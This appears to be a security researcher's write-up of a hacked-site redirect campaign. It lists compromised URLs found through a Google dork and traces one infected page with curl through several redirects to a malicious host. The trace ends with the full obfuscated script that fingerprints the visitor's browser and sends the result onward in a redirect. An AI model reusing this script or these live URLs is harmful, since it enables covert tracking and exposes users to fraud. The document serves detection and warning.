- // =========================================================================================
- // Hacked URLs found via Google by searching for "allinurl:php?teu=" (a Google dork query).
- // -----------------------------------------------------------------------------------------
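- // (Don't click them, the pages still existed when this was written!!)
- // All of them share one shape: a random 4-character directory, a random 5-character .php file
- // and a search keyword in the teu= parameter. Site owners can look for that shape in their
- // web root and access logs.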
- thegriffinhouse.org/4wut/xhsk5.php?teu=raspbian-web-proxy
- www.raumwert.cc/yw5b/e9ai5.php?teu=mitmproxy...proxy
- haiproject.org/ve7l/orguj.php?teu=raspberry-pi-ssh-tunnel-proxy
- www.mezzbrands.com/dlo3/0cbjc.php?teu=pi-proxy
- www.retire21.org/zr7h/8jpac.php?teu=squid-listen-ipv4
- yadleah.org/owdt/uzdiy.php?teu=privoxy-vs-pi-hole
- kriteri.az/vqfx/67oth.php?teu=deluge-force-proxy
- www.propertify.se/wvbx/kdjck.php?teu=squid-listen-ipv4
- biralabwa.com/cjsp/xrmzo.php?teu=mitmproxy-alternative
- www.zphabiganj.org/nrmv/xgs4c.php?teu=privoxy-vs-pi-hole
- innovativemassagece.com/6dd9/nkfxc.php?teu=ipv6-proxy...
- izabelawojcik.com/cb5l/srkmg.php?teu=tor-server-setup
- loshylimited.com/zkt3/c2g6v.php?teu=deluge-force-proxy
- ...
- // =========================================================================================
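- // Curling one infected page: three 302 redirects, then a 200 page whose script collects
- // browser properties (screen, plugins, canvas/font/WebGL output, ...) and redirects once more
- // with the result appended as code=.
- // The first hop hands the compromised host and the keyword to 5.45.79.15 in mark= and engkey=.
- // Note: in the last response body curl's "* Connection #0 ... left intact" line is mixed into
- // the HTML, so the script as pasted below is not byte-exact.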
- // -----------------------------------------------------------------------------------------
- $> curl -v http://proclean-gmbh.de/alf6/nonh0.php\?teu=scam
- * Trying 85.13.131.63...
- * TCP_NODELAY set
- * Connected to proclean-gmbh.de (85.13.131.63) port 80 (#0)
- > GET /alf6/nonh0.php?teu=scam HTTP/1.1
- > Host: proclean-gmbh.de
- > User-Agent: curl/7.54.0
- > Accept: */*
- >
- < HTTP/1.1 302 Moved Temporarily
- < Date: Fri, 02 Feb 2018 21:14:52 GMT
- < Server: Apache
- < Upgrade: h2,h2c
- < Connection: Upgrade
- < Location: http://5.45.79.15/input/?mark=20180202-proclean-gmbh.de/alf6&tpl=9&engkey=scam
- < Transfer-Encoding: chunked
- < Content-Type: text/html
- <
- * Connection #0 to host proclean-gmbh.de left intact
- $> curl -v http://5.45.79.15/input/\?mark\=20180202-proclean-gmbh.de/alf6\&tpl\=9\&engkey\=scam
- * Trying 5.45.79.15...
- * TCP_NODELAY set
- * Connected to 5.45.79.15 (5.45.79.15) port 80 (#0)
- > GET /input/?mark=20180202-proclean-gmbh.de/alf6&tpl=9&engkey=scam HTTP/1.1
- > Host: 5.45.79.15
- > User-Agent: curl/7.54.0
- > Accept: */*
- >
- < HTTP/1.1 302 Found
- < Date: Fri, 02 Feb 2018 21:15:03 GMT
- < Server: Apache/2.2.15 (CentOS)
- < X-Powered-By: PHP/5.6.30
- < Set-Cookie: thevisited=1; expires=Sat, 03-Feb-2018 21:15:03 GMT; Max-Age=86400; path=/; domain=.5.45.79.15
- < Location: http://www.bestphoneapp.net/?sl=2752853-f60b9
- < Content-Length: 0
- < Connection: close
- < Content-Type: text/html; charset=UTF-8
- <
- * Closing connection 0
- $> curl -v http://www.bestphoneapp.net/\?sl\=2752853-f60b9
- * Trying 18.194.70.215...
- * TCP_NODELAY set
- * Connected to www.bestphoneapp.net (18.194.70.215) port 80 (#0)
- > GET /?sl=2752853-f60b9 HTTP/1.1
- > Host: www.bestphoneapp.net
- > User-Agent: curl/7.54.0
- > Accept: */*
- >
- < HTTP/1.1 302 Found
- < Date: Fri, 02 Feb 2018 21:15:12 GMT
- < Content-Type: text/html; charset=UTF-8
- < Transfer-Encoding: chunked
- < Connection: keep-alive
- < Server: nginx
- < Set-Cookie: vidf=czo2NDoiYmRhOGZmMWE5Y2RmMWQ0YzM1ZmZiZTZhOWQzMzY0ZTZhMjZlNjY1NDBmNDM1ZTFhZWRmMGJkMTNlZWYyMmRhNCI7; expires=Thu, 03-May-2018 20:15:12 GMT; Max-Age=7772400; path=/; domain=www.bestphoneapp.net
- < Set-Cookie: vt=506844-1517606112; expires=Sat, 03-Feb-2018 21:15:12 GMT; Max-Age=86400; path=/; domain=bestphoneapp.net
- < Set-Cookie: _s=2752853; expires=Sat, 03-Feb-2018 21:15:12 GMT; Max-Age=86400; path=/; domain=bestphoneapp.net
- < Set-Cookie: rd=YjoxOw%3D%3D; expires=Sat, 03-Feb-2018 21:15:12 GMT; Max-Age=86400; path=/; domain=www.bestphoneapp.net
- < Location: http://d.billyaffcontent.com/d/11685513e11bcfa62?sub=9035500000118074927-201802-54c8d2b8f6&source=4612
- < Referrer-Policy: no-referrer
- <
- * Connection #0 to host www.bestphoneapp.net left intact
- $> curl -v http://d.billyaffcontent.com/d/11685513e11bcfa62\?sub\=9035500000118074927-201802-54c8d2b8f6\&source\=4612
- * Trying 62.212.87.141...
- * TCP_NODELAY set
- * Connected to d.billyaffcontent.com (62.212.87.141) port 80 (#0)
- > GET /d/11685513e11bcfa62?sub=9035500000118074927-201802-54c8d2b8f6&source=4612 HTTP/1.1
- > Host: d.billyaffcontent.com
- > User-Agent: curl/7.54.0
- > Accept: */*
- >
- < HTTP/1.1 200 OK
- < Server: nginx
- < Date: Fri, 02 Feb 2018 21:15:21 GMT
- < Content-Type: text/html
- < Content-Length: 7829
- < Last-Modified: Thu, 25 Jan 2018 16:59:08 GMT
- < ETag: "5a6a0cdc-1e95"
- < Accept-Ranges: bytes
- <
- <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Loading...</title> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgo="> <meta name="viewport" content="width=device-width,initial-scale=1"> </head> <body> <div class="void" style="opacity:0;position:absolute;top:-1000px;left:-1000px"> <canvas id="canvas"></canvas> </div> <script>var e=document.querySelector(".void"),m=document.getElementById("canvas");m.width=14;m.height=14;var p=m.getContext("2d");function r(k,h){for(var b=[],c=0;c<k.length;c++)b.push(k[c].charCodeAt(0));var g,d,f;if(0===b.length)return"";d=[0];for(c=0;c<b.length;){for(f=0;f<d.length;)d[f]<<=h?0:8,f++;d[0]+=b[c];for(f=g=0;f<d.length;)d[f]+=g,g=d[f]/58|0,d[f]%=58,++f;for(;g;)d.push(g%58),g=g/58|0;c++}for(c=0;0===b[c]&&c<b.length-1;)d.push(0),c++;b="";d=d.reverse();for(c=0;c<d.length;c++)b+="123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"[d[c]];return b}function v(k){try{return eval(k)}catch(h){return!0}}function w(k,h){var b=document.createElement(h);return"function"==typeof b.canPlayType&&(b=b.canPlayType(k),"maybe"==b.toLowerCase()||"probably"==b.toLowerCase())?!0:!1}!function(k,h,b,c,g,d,f){var n;try{n=function(){function d(a){return"function"==typeof a||!1}var g,n=new Date,q=[function(){return+new Date},function(){return 5},function(){return b.platform},function(){return"ontouchstart"in h||"onmsgesturechange"in h?1:f},function(){return c.availWidth},function(){return c.availHeight},function(){return b.plugins&&b.plugins.length},function(){return(g.ontouchstart+"")[0]},function(){return(h.g+"")[0]},function(){return h.MSGesture?1:f},function(){return h.innerWidth},function(){return h.innerHeight},function(){return n.getTimezoneOffset()},function(){return(new Date).getTime()-n.getTime()},function(){return b.buildID},function(){return b.cookieEnabled?1:f},function(){return b.performance&&b.performance.navigation&&b.performance.navigation.redirectCount||f},function(){return 
b.performance&&b.performance.navigation&&b.performance.navigation.type||f},function(){return h.orientation},function(){return h.devicePixelRatio},function(){return b.vendor},function(){return c.pixelDepth},function(){return c.colorDepth},function(){return c.deviceXDPI},function(){return c.e},function(){return d(k.hasFocus)?k.hasFocus():f},function(){return d(k.getComputedStyle)?1:f},function(){return h.history&&d(h.history.pushState)?1:f},function(){return c.width},function(){return c.height},function(){return window!=window.top},function(){return b.userAgent},function(){var a=[],b=document.createElement("div");b.innerHTML='<fieldset disabled><input type="text"></fieldset>';a.push(b.querySelector("input:disabled")? 0:1);a.push(v("!MutationObserver")?1:0);a.push(document.d?0:1);a.push("undefined"===typeof document.hidden||"undefined"===typeof document.webkitHidden?1:0);a.push(window.requestAnimationFrame?0:1);a.push(v('(typeof document.createElement("iframe").srcdoc)[0] === "u"')?1:0);return a.join("")},function(){var a=[];a.push(v('typeof window.SpeechSynthesisUtterance === "undefined"')?1:0);a.push(window.HTMLPictureElement?0:1);return a.join("")},function(){var a=[];a.push("undefined"===typeof document.createElement("a").f? 
1:0);a.push(w("video/webm","video")?0:1);a.push(w("audio/ogg","audio")?0:1);a.push(v('document.body.querySelector(":nth-child(1 of .foo)")')?0:1);return a.join("")},function(){var a=[];a.push("undefined"===typeof window.openDatabase?1:0);a.push(v('document.querySelector("div:dir(ltr)")')?0:1);a.push("ondeviceproximity"in window?1:0);return a.join("")},function(){var a=[];a.push(window.chrome&&window.chrome.h?1:0);return a.join("")},function(){try{for(var a in b.plugins)if(b.plugins[a].name&&-1<b.plugins[a].name.toString().indexOf("Flash"))return!0}catch(c){}return!1},function(){var a=[];a.push(v('(typeof window.PaymentRequest)[0] === "f"')?1:0);a.push(v('(typeof window.MediaRecorder)[0] === "f"')?1:0);a.push(v('navigator.connection.type[0] === "w" || navigator.connection.type[0] === "c"')?1:0);return a.join("")},function(){var a=[];a.push(v("navigator.language")?1:0);a* Connection #0 to host d.billyaffcontent.com left intact
- .push(v("navigator.userLanguage")?1:0);a.push(v("navigator.browserLanguage")?1:0);a.push(v("navigator.systemLanguage")?1:0);return a.join("")},function(){var a=[];a.push(v("!!window.sessionStorage")? 1:0);a.push(v("!!window.localStorage")?1:0);a.push(v("!!window.indexedDB")?1:0);a.push(v('navigator.hardwareConcurrency ? navigator.hardwareConcurrency : "unknown"')?1:0);a.push(v('navigator.platform ? navigator.platform : "unknown"')?1:0);a.push(v('navigator.doNotTrack ? navigator.doNotTrack : "unknown"')?1:0);a.push(v('navigator.msDoNotTrack ? navigator.msDoNotTrack : "unknown"')?1:0);a.push(v('window.doNotTrack ? window.doNotTrack : "unknown"')?1:0);return a.join("")},function(){var a=0,b=!1;"undefined"!==typeof navigator.b?a=navigator.b:"undefined"!==typeof navigator.c&&(a=navigator.c);try{document.createEvent("TouchEvent"),b=!0}catch(c){}return[a?1:0,b?1:0,"ontouchstart"in window?1:0].join("")},function(){if("undefined"!==typeof navigator.a)try{if(navigator.a[0].substr(0,2)!==navigator.language.substr(0,2))return!0}catch(a){return!0}return!1},function(){return v("navigator.oscpu")},function(){return v("navigator.productSub")},function(){return v("eval.toString().length")},function(){var a=document.createElement("canvas");return!(!a.getContext||!a.getContext("2d"))},function(){return document.referrer},function(){var a="",a=document.createElement("div");a.innerHTML="<style>span{color:rebeccapurple}</style><span>rbcc</span>";e.appendChild(a);return a=getComputedStyle(a.querySelector("span")).color.match(/\d/g).join("")},function(){return v("navigator.connection.type")},function(){var a=[];p.font="12px monospace";p.fillStyle="white";for(var b=["\ud83d\udc58","\ud83d\udc44","\ud83d\udc7e","\ud83d\udcf1"],c=0;4>c;c++)p.clearRect(0,0,14,14),p.fillText(b[c],0,12),a.push(r(m.toDataURL("image/png"),!0));return a.join("")},function(){p.fillStyle="black";var a="Dancing 
Script;sans-serif-light;sans-serif-condensed-light;Zapfino;Cochin;sans-serif-black;Cambria;serif-monospace;Damascus;sans-serif-smallcaps;Noto Serif;Bookerly;HelveticaNeue;Avenir-Book;ArialMT;Microsoft Sans Serif;Comic Sans;Superclarendon-Regular;Georgia;Open Sans;FreeSans;Algerian;Bookman Old Style;Bitstream Vera Sans;FreeSerif;sans-serif-condensed;AppleSDGothicNeo-Thin;sans-serif-thin;sans-serif-medium;Droid Sans;AppleColorEmoji;Monospace;Webdings;TrebuchetMS;Tahoma;Roboto;Lucida Console;DejaVu Sans;DBLCDTempBlack;Calibri;FreeMono;Lucida;casual;Impact;AlNile-Bold;AmericanTypewriter;Ubuntu;Syncopate;Liberation Serif;Didot;AcademyEngravedLetPlain;Trebuchet;OpenSymbol".split(";");m.width=14*a.length;p.clearRect(0,0,14,14);for(var b=0,c=a.length;b<c;b++)p.font="16px "+a[b],p.fillText("B",14*b,12);return r(m.toDataURL("image/png"),!0)},function(){return window.name},function(){try{var a=document.createElement("canvas").getContext("webgl"),b=a.getExtension("WEBGL_debug_renderer_info");try{return a.getParameter(b.UNMASKED_VENDOR_WEBGL)}catch(c){return 1}}catch(d){return 0}},function(){try{return document.createElement("canvas").getContext("webgl").getSupportedExtensions().length}catch(a){return"0"}}],t=[],u="ctm ver plt tch aw ah crx tchl msgl msg iw ih tz tdff buid cke prfrd prfnv ornt dpr vnd pd cdp dxdp dydp hsfc gcs whst ww wh frm ua a43 a44 sf ff chd flv chm lng strg mxtch mnlng oscpu prdsub evln cnv ref rbcc cntp emjf ttfp wnm wglv wgle".split(" ");for(g=0;g<u.length;++g)try{t.push([u[g],q[g]()].join(""))}catch(x){t.push([u[g],"!"+x.message].join(""))}return t.join("\x00")}()}catch(q){try{n=l([0,q.message||q].join("\x00"))}catch(y){n=""}}window.location.replace(g.replace("/d/","/l/")+r(n))}(document,window,navigator,screen,location.href+(location.href.split("?")[1]?"&":"?")+"code=");</script> </body> </html>% $>